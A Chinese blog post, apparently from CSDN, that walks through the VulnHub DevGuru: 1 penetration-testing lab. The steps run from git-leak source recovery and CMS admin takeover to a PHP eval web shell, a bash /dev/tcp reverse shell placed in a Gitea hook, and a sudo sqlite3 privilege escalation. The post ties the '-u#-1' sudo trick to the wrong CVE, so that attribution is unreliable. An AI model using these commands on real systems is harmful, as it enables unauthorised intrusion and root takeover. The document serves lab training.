vulhub靶场DEVGURU: 1-SUDO提权

最新推荐文章于 2024-11-14 18:23:29 发布
最新推荐文章于 2024-11-14 18:23:29 发布
阅读量1k 收藏 9
点赞数 8
文章标签: 服务器 linux 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55349490/article/details/139309135
版权

目录


环境搭建DevGuru: 1 ~ VulnHub

信息收集:

nmap 192.168.0.0/24
nmap -p 1-65535 192.168.0.5

先用第一条命令扫出网站ip
再用第二条命令扫出所有端口

dirsearch扫描出git

git泄漏(利用点)

python GitHack.py http://192.168.0.5/.git/
下载源码

访问管理(Web入口):

在源码里面查看有一个adminer.php
网页访问/adminer.php

发现是一个数据库管理页面(这里可以在源码里面获取到数据库账号密码,再从数据库里面获取到网站账号密码)
/config/database.php里面获取到数据库账号密码

登录数据库
找到后台的登录

但密码被加密了。我们先看下管理员Frank的数据信息

然后我们新建一个用户,必要的字段要与之相同(也可以直接改Frank的密码,用Frank用户登录)

成功创建

将新建的用户加入管理员用户组

然后到后台登录
后台是翻源码翻出来的
/backend/backend/auth/signin

登录成功

在CMS处找到利用点
模板写入后门

function onStart(){
     //蚁剑连接
    eval($_POST["pass"]);
    }


蚁剑连接

当前权限

找备份寻突破(升权):

尝试利用SUDO提权
cat /etc/sudoers
发现权限被拒绝

在文件管理里面获取到备份文件

这里面获取到数据库账号密码

登录数据库

修改管理员账户密码
生成一个123456的Bcrypt加密

填入加密值与加密算法

登录后台
http://192.168.0.5:8585/admin

将反弹命令写入更新Hooks里面

bash -c "exec bash -i >& /dev/tcp/192.168.0.4/5555 0>&1"

监听端口。反弹shell
只要对源文件进行更改就会执行反弹shell命令

获得到了一个普通用户的权限>www-data权限

利用sudo提权(cve):

sudo -l

GTFOBins 搜索sqlite3的SUDO利用

但执行失败了

sudo sqlite3 /dev/null '.shell /bin/sh'


这里失败的原因是SUDO版本问题
绕过SUDO版本

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'  //这里利用了SUDO的一个cve漏洞CVE-2021-3156

提权成功

总结:
git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)
gitea数据库配置备份文件泄露 => 连接gitea数据库,找到gitea的用户密码 => 登入gitea,写shell(更高权限) => 提权

为几何欢
关注
Centos yum install出现Error: Unable to find a match: epel-release的解决方案
weixin_43178406的博客
07-27 6万+
本文主要介绍了使用Centos8进行yum install epel-release时出现Error: Unable to find a match: epel-release错误提示的解决方案,希望能对使用Linux的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
全网详细解决sudo: apt-get: command not found以及详细分析yum和apt-get的区别
热门推荐
念兮为美
02-22 3万+
全网详细解决sudo: apt-get: command not found以及详细分析yum和apt-get的区别。
vulnhubdevguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 1418
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
vulhub靶场DEVGURU:1
weixin_45653478的博客
07-06 1144
发现主机IP地址为“192.168.1.11。
vulnhub-DevGuru:1
yutianovo的博客
12-24 956
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
红队打靶练习:DEVGURU: 1
分享
02-12 1656
红队打靶练习:DEVGURU: 1。。。有点难!
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场
m0_62652276的博客
12-02 1406
OSCP推荐靶场VulnHub DevGuru: 1 个人打靶笔记
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L "https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(uname -s)-$...我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulnhubdevguru靶场打靶
maple_leaf
10-19 660
Devguruvulnhub一个靶场DevGuru 是一家虚构的网络开发公司,聘请您进行渗透测试评估。您的任务是在其公司网站上查找漏洞并获得root
docker搭建vulhub靶场
weixin_55554070的博客
08-27 1132
近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链接:https://www.jianshu.com/p/8264936cac30 步骤一:确定centos7能上网 步骤二:安装docker需要先
vulnhub--devguru
weixin_45922278的博客
02-10 993
描述 DevGuru是一家虚构的Web开发公司,它聘请您进行渗透测试。您的任务是在他们的公司网站上查找漏洞并获得根。 就像OSCP一样〜现实生活为基础 难度:级(取决于经验) 目录 一、信息搜集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测&利用 1 . GitHack.py 2.登入cms后台 1)写入一句话木马。 2)或者反弹shell 3.获取gitea数据库密码 1)在github 找到加密方式(大佬方式) 2)在gethub上...
VulnHub-DevGuru: 1
江左盟的博客
08-06 1万+
信息收集 使用Nmap扫描目标主机发现目标主机开启22,80和8585端口,分别运行着OpenSSH 7.6p1服务,Apache httpd 2.4.29服务和git存储库,且服务器80端口存在.git目录,操作系统为Ubuntu,如图: 利用GitHack将源码下载到本地,如图: 查看README.md文件发现该网站使用October CMS,查看config/database.php文件发现MySQL数据库:octoberdb,用...
Vulnhub lin security靶场超全sudo提权
weixin_68615160的博客
07-29 521
靶场描述提供了bob用户,密码为secret。
ThinkServer SR658H V2服务器BMC做raid与装系统
Lzcsfg的博客
11-13 366
要求: 1. 将两个894G的磁盘做成raid1 2. 将两块14902G的磁盘各自做成raid0
Linux通过使用scp和sftp发送或拉取文件
2301_80892630的博客
11-10 673
你可以使用scp或sftp通过 SSH 协议进行文件传输。scp是一种简单的命令行工具,适合一次性传输文件,而sftp则提供了更灵活的交互式环境。根据你的需求选择合适的工具进行文件传输。不过还有一种方式能够进行文件传输。虽然通过telnet登录后不能直接发送文件,但你可以使用其他安全且高效的工具来完成文件传输。强烈建议使用基于 SSH 的scp或sftp,因为它们不仅安全,还很方便。
UnixBench和Geekbench进行服务器跑分
nangonghen的博客
11-10 947
通过UnixBench和geekbench5工具压测服务器
为什么海外服务器IP会被封
最新发布
m0_70754056的博客
11-14 121
海外服务器虽然价格比较便宜对比国内服务器少了很多限制,但是防御基本上是很低的,受到攻击无力抵抗,也比较容易受到影响。如果服务器IP被封,在该服务器下的所有业务都无法访问,对自己和对用户来说都会有较大的影响。因此,我们应做好相应准备,避免服务器被封IP。日常使用服务器应做好安全防护,一旦被入侵,很有可能变成肉鸡,被用来攻击或者扫描其他服务器,识别到就会被拦截,服务器IP也会被封停。海外服务器因为免备案而备受用户欢迎,近年来租用海外服务器的用户也越来越多,自然也可能会出现一些问题。1.黑客入侵,违法违规操作。
服务器】本地安装X11 服务器-Windows
WW、forever的博客
11-12 1167
服务器】本地安装X11 服务器-Windows
Springboot如何打包部署服务器
11-14 394
文章目的:java项目打包成jar包或war包, 放在服务器上去运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值